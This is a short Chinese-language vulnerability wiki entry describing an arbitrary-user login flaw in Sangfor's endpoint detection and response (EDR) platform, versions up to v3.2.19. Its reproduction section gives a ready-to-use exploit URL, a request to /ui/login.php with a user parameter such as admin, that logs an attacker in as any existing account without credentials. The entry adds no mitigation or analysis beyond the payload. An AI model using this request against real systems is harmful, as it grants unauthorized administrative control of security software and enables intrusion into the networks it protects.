深信服后台任意用户登陆漏洞

漏洞描述

深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,登录任意用户

影响版本

[!NOTE]

EDR <= v3.2.19

漏洞复现

https://xxx.xxx.xxx.xxx/ui/login.php?user=admin

[!NOTE]

注意最后的admin需要为存在的用户名

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:42

results matching ""

    No results matching ""